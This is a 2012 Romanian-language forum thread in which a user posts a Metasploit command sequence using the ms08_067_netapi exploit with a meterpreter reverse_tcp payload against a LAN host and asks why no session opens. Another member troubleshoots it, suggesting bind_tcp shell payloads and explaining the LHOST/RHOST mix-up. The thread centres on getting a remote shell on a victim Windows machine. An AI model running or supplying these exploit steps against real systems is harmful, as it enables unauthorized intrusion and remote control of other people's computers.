rypp34 Posted April 19, 2012 Report Posted April 19, 2012 (edited) am incercat sa fac un exploit de pe laptop pe pc..... si am folosit framework3 cam asa:cd /pentest/exploits/framework3./msfconsoleuse windows/smb/ms08_067_netapiset lhost 192.168.0.105set lport 445set rhost 192.168.0.103set payload windows/meterpreter/reverse_tcpsessions -iexploit problema e ca :dupa ce scriu sessions -i spune ca nu am nici o sesiune activasi dupa ce dau exploit spune ca nu se poate lega de 192.168.0.105 (lhost) dupa care ramane asa intr-un stadiu de asteptare....stie careva vreo solutie sau vreun alt handler? (personal am incercat cu asta : use windows/multi/handler si nu a mers)// Mersi pentru lamurire co4ie , a mers cu alt payload si acum incerc si altele! Edited April 19, 2012 by rypp34 Quote
co4ie Posted April 19, 2012 Report Posted April 19, 2012 In pimul rand sesiunile se deschid dupa ce exploitul a fost executat .. in al doilea rand ai putea incerca sa folosesti ca payload windows/meterpreter/bind_tcp sau windows/shell/bind_tcp pentru ca la reverse_tcp trebui sa faca upload la stager si sa il execute ! Daca nu ai drepturi de scriere/executare nu o sa iti mearga payload-ul ! Din ce ai postat se vede ca 192.168.0.105 este ip-ul tau, la reverse_tcp ,normal ar trebui sa inceapa sa astepte conexiunea chiar daca exploitul nu functioneaza deci verifica sa nu fi incurcat LHOST(localhost/ip`ul tau) cu RHOST(remotehost/ip`ul victimei)!BTW: asta e thread-ul de exploituri nu de ajutor ... ai gresit sectiunea !! Quote
pyth0n3 Posted April 19, 2012 Report Posted April 19, 2012 (edited) Read The Fucking ManualSa iti dau o mana de AjutorMoved. Edited April 19, 2012 by pyth0n3 Quote